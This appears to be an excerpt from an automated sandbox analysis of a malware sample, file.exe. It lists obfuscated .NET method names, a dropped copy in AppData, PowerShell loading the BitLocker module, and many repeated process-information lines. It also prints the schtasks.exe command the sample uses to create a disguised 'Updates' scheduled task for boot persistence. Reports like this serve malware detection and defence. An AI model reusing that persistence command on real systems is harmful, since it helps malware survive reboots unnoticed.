Source: 4.2.file.exe.38e3958.2.raw.unpack, f2bIYw5HsYatqje517.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'vOcBW482my', 'BswBDXLDQs', 'MUgBztGMWj', 'QVP9Rv8cOH', 'gyE9URdmUo', 'akI9B2hWtN', 'kQQ990G6um', 'IhIZlVDaCViN61ZRAND'
Source: 4.2.file.exe.38e3958.2.raw.unpack, TLLCCEdYsihF24ts6B.cs	High entropy of concatenated method names: 'rwk9vxgDYI', 'efK9buOLdt', 'ph99TMQtUf', 'J9h95XNyMK', 'o7T9KvniEF', 'Nkk96DnLWY', 'zIi9ifk7rm', 'ufc9d6uIMy', 'Y0E9ArjySW', 'dMT9HkJuBR'
Source: 4.2.file.exe.38e3958.2.raw.unpack, WXQhAuTtwVUMKNvKl0.cs	High entropy of concatenated method names: 'Dispose', 'tohUWFxhA1', 'h2VBqlhHAE', 'r7UDktkXVS', 'SmiUDsm7mK', 'nAZUzVP9Eu', 'ProcessDialogKey', 'Y7bBRPgQQj', 'PWNBUJgZKm', 'OvfBBIikgd'
Source: 4.2.file.exe.38e3958.2.raw.unpack, aD3FN2Fse7siwHW4tW.cs	High entropy of concatenated method names: 'elWibIcqTB', 'gpli53ToUr', 'orei6u96Ag', 'o886DdrlUt', 'Goy6zPQaCV', 'pUciRSpdDP', 'gbJiUNX9fP', 'HoAiBjuxPl', 'RsXi9RTywQ', 'o8CiG1rbJk'
Source: 4.2.file.exe.38e3958.2.raw.unpack, H1wHKjUG7C2enf6PVRU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BEf3nDXkex', 'JXf3Qjs8tt', 'iNK3SZKRP8', 'dxa3379yvC', 'xDZ3xen5lM', 'BTk3hjL3iF', 'BdV3yFBpiU'
Source: 4.2.file.exe.38e3958.2.raw.unpack, DikgdCDkjxIte2PlHA.cs	High entropy of concatenated method names: 'aKZQ5BH09l', 'z1MQKX7PC7', 'wpqQ6JFnhp', 'Dk5QiPNB12', 'm67QnngKeX', 'n7GQdmLCVY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 4.2.file.exe.38e3958.2.raw.unpack, YKaaB7sFnGxbxImEpX.cs	High entropy of concatenated method names: 'Rd5KLWbMGU', 'SeKKor1jA9', 'svT5cwEIu5', 'ePQ5rO0j00', 'MaK5EnBExi', 'pBx54Cuu6k', 'lTB5FWTRc6', 'xRW5ks4jX2', 'IpW5wbXKVH', 'pCl58QnJaH'
Source: 4.2.file.exe.38e3958.2.raw.unpack, ejZIv3204H9gEM16dT.cs	High entropy of concatenated method names: 'zgUp84NEvi', 'Bh2pjF2GwB', 'KQkp2LGQoO', 'KYApM0pPIj', 'Bqfpq55uDo', 'J9vpcd9J8k', 'kavprkWBHd', 'Ah3pEl0pIw', 'a7xp4bYg4l', 'ytmpFP10Nd'
Source: 4.2.file.exe.38e3958.2.raw.unpack, Clabo97eqthAWGxWJ3.cs	High entropy of concatenated method names: 'klJ5JE660y', 'L7t5ZD8JDd', 'MIl5IlCAs8', 'qTW57ZCC17', 'MHd5pPcxNQ', 'HZA5esIYjg', 'vU95aB8eIm', 'sZw5l6hokB', 'TrQ5nfqBT1', 'F1F5QdU8En'
Source: 4.2.file.exe.38e3958.2.raw.unpack, fPgQQjWjWNJgZKmmvf.cs	High entropy of concatenated method names: 'f6unXMGCpb', 'scwnqTrwjp', 'CtrncYRQNK', 'LvAnrBP5qp', 'NuTnEC91R3', 'ymxn4Yn7FN', 'SeRnFa6VLI', 'V9WnkN9kZG', 'yQRnwVuxyh', 'zeMn81gl2Q'
Source: 4.2.file.exe.38e3958.2.raw.unpack, afGEjvURtp2vPLdIck5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SaJQmG0UPF', 'zX6QjRQPdA', 'wkTQtLgP4n', 'M97Q2scW3P', 'yEeQMFBRlO', 'AGmQVAFXA2', 'P88QCQbXTg'
Source: 4.2.file.exe.38e3958.2.raw.unpack, DAU8UcGBhxVOQThrt9.cs	High entropy of concatenated method names: 'OlqUiu3Lcc', 'gshUdv3oFD', 'deqUHthAWG', 'vWJUP3DKaa', 'DmEUppXJdP', 'udDUe1HF84', 'hNsYoKNjxgswTbOBb8', 'MjYpE7BfDyWwG9MUWd', 'loAUUC1Hv3', 'vK7U9idPiN'
Source: 4.2.file.exe.38e3958.2.raw.unpack, rqsGGKqqiMvyjqsarR.cs	High entropy of concatenated method names: 'rIr1S8X6WdKukH9IghR', 'mXIpxsXS9R6HbPjjOE2', 'SyE6lSafZU', 'pKP6nbg3yK', 'AwE6QLMURO', 'nIvQl3X9DeEKFWdu4Wm', 'rAk89UXyxYthlNoB5Js'
Source: 4.2.file.exe.38e3958.2.raw.unpack, AdP3dDX1HF845moAt1.cs	High entropy of concatenated method names: 'W7a6v02nar', 'G8K6TVA7xb', 'U5G6K3gaP5', 'mlK6iW1tnj', 'G6J6ddL1Jl', 'kRxKfqPDIJ', 'dWqK0eIWDG', 'MSkKNAy1CR', 'lFgKOd3SEB', 'VhjKWPmtrr'
Source: 4.2.file.exe.38e3958.2.raw.unpack, wJScZWV5dIbfbnZf6F.cs	High entropy of concatenated method names: 'ToString', 'uq4emPVxi8', 'MxXeq9Y68P', 'bqmec0Ur0b', 'QBjer45b81', 'WE3eEDh4bo', 'sIfe44KBek', 'jFMeFnHdlu', 'eBRekfqAT7', 'dywewk8OZi'
Source: 4.2.file.exe.38e3958.2.raw.unpack, lPmUAfzqLScwnGQDWH.cs	High entropy of concatenated method names: 'GDJQZKDFOD', 'BpTQIjSpSZ', 'Aq2Q71PAWs', 'bw9QXZgOHM', 'aVFQqx9XRN', 'K3cQrycfD3', 'cHqQE06Sxb', 'HOdQygyPFr', 'PitQ1i1R6s', 'FWEQYW4mAl'
Source: 4.2.file.exe.38e3958.2.raw.unpack, TlidgCUUD0JX3EXUMrO.cs	High entropy of concatenated method names: 'SGgQDmUhGQ', 'FpjQzE1YYS', 'cTgSR44xqp', 'yEgSUShtJ8', 'UG1SBU4pSa', 'wyGS91wdFd', 'Dy8SG7oYKb', 'IDTSvsoiJQ', 'loaSbT5Hv6', 'gHPST6rGmy'
Source: 4.2.file.exe.38e3958.2.raw.unpack, Gu3LccITshv3oFDMFh.cs	High entropy of concatenated method names: 'bjdT26vupF', 'onGTMZk25O', 'H8RTVS5c6B', 'Eq9TCry0Gw', 'UrRTfwZJyZ', 'BSjT0f7yiN', 'dbHTNkr1yj', 'sHkTOytoN2', 'aNOTWSPDge', 'bIPTDmQ56A'
Source: 4.2.file.exe.38e3958.2.raw.unpack, CR3bRGBCAmZgaoaiBv.cs	High entropy of concatenated method names: 'UoDuNy0lO', 'IAHJWf8HZ', 'GYvZmSLPC', 'dPRoEkR4n', 'cb37BrdWR', 'yeis8DD8i', 'EVjAhIU9IPwtyZCmbJ', 'lPwWLtPb22pUHUbsfm', 'Pp1lP0MNH', 'vPkQvP6KS'
Source: 4.2.file.exe.38e3958.2.raw.unpack, XSXCsxt8MVV4UfkZJI.cs	High entropy of concatenated method names: 'WvkgIaQaIV', 'cHWg7NGqHW', 'ELhgXTKWEU', 'BbHgqvMgWk', 'z3igreS2OU', 'R9agEnlPRS', 'RlogFDeOFP', 'op7gkrjXfO', 'o6sg8VwNyo', 'h2wgmsuoFK'
Source: 4.2.file.exe.38e3958.2.raw.unpack, dab2jcN1RSohFxhA1V.cs	High entropy of concatenated method names: 'ayhnp6aoDY', 'ru8naPVIiD', 'fg9nnapXAb', 'tOlnSxbmqb', 'hRvnxnlroo', 'zdFnychQ2n', 'Dispose', 'tShlbfrIu7', 'hZxlTgmP2c', 'fSgl5vdmAO'
Source: 4.2.file.exe.38e3958.2.raw.unpack, vAa5gWwrVs4mA315dh.cs	High entropy of concatenated method names: 'sIqi1QwF6b', 'DFjiYdJthP', 'p5RiucQWeE', 'GStiJyYlOy', 'G99iLmO2Yh', 'Tc8iZHyW04', 'l2hioj3Y0x', 'VUtiItlRbN', 'Iufi7E8evp', 'ivOisKPtxL'
Source: 4.2.file.exe.38e3958.2.raw.unpack, pg1UhnUByfQeqNVmatA.cs	High entropy of concatenated method names: 'ToString', 'PpiSIu1QY4', 'EcGS79IBuB', 'heOSs3yqi8', 'uSJSXB585Z', 'lEQSq7LHKy', 'KS3Sc6qjDS', 'MRUSrwLUpF', 't1iCnHaexdXkUWqWis1', 'jYxv1faFJ1mrTEtXeiw'

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
